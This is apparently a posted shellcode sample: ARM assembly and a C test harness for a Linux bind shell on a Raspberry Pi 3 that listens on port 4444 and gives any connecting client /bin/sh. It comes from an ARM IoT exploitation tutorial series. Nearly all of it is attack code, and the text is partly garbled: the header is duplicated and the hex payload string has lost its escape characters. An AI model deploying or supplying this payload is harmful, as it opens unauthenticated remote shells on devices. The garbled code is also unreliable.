Linux ARM Raspberry Pi Bindshell Shellcode

/*

##################################
# Andrea Sindoni - @invictus1306 #
##################################

This schellcode is part of my episodes:
- ARM /*

##################################
# Andrea Sindoni - @invictus1306 #
##################################

This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/

Enviroment: Raspberry pi 3

Default settings for port:4444

@.syntax unified
.global _start
_start:

mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
sub r2, r2, r2 @ sin_addr
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct
mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#282 @ bind syscall
swi 0

@ listen for incoming connections via SYS_LISTEN
@ int listen(int sockfd, int backlog);

mov r0, r6 @ mov sockfd into r0
mov r1, #1 @ backlog=1
ldr r7, =#284 @ listen syscall
swi 0

@ Accept connections
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)

mov r0, r6 @ mov sockfd into r0
sub r1, r1, r1 @ addr=0
sub r2, r2, r2 @ addrlen=0
ldr r7, =#285 @ accept syscall
swi 0

@ Redirect stdin, stdout and stderr via dup2

mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
loop:
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop

@ int execve(const char *filename, char *const argv[],char *const envp[]);
mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0

_exit:
mov r0, #0
mov r7, #1
swi 0 @ exit(0)

.asciz "/bin/sh"

Assemble and link it:
as -o bind.o bind.s
ld -o bind bind.o
*/

#include <stdio.h>

char *code="x02x00xa0xe3x01x10xa0xe3x00x20xa0xe3xa0x70x9fxe5x00x00x00xefx00x60xa0xe1x5cx10xa0xe3x11x50xa0xe3x01x1cxa0xe1x05x18x81xe0x02x10x81xe2x02x20x42xe0x06x00x2dxe9x0dx10xa0xe1x10x20xa0xe3x06x00xa0xe1x70x70x9fxe5x00x00x00xefx06x00xa0xe1x01x10xa0xe3x47x7fxa0xe3x00x00x00xefx06x00xa0xe1x01x10x41xe0x02x20x42xe0x50x70x9fxe5x00x00x00xefx02x10xa0xe3x3fx70xa0xe3x00x00x00xefx01x10x41xe2x01x00x71xe3xfaxffxffx1ax0fx00xa0xe1x20x00x80xe2x02x20x42xe0x05x00x2dxe9x0dx10xa0xe1x0bx70xa0xe3x00x00x00xefx00x00xa0xe3x01x70xa0xe3x00x00x00xefx2fx62x69x6ex2fx73x68x00x19x01x00x00x1ax01x00x00x1dx01x00x00";

int main(void) {

(*(void(*)()) code)();

return 0;

}